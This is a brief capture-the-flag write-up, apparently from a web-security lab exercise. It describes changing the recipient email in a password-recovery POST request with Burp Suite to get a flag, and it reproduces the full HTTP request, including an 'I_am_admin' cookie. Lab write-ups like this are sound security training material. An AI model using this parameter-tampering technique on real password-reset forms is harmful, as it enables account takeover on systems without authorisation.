Using Burp suite
click on forget password
found the webmaster email in plain text as post request
I changed it to my email
then got the flag


POST /?page=recover HTTP/1.1
Host: 10.11.1.5
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://10.11.1.5
Connection: close
Referer: http://10.11.1.5/?page=recover
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
Upgrade-Insecure-Requests: 1

mail=webmaster%40borntosec.com&Submit=Submit
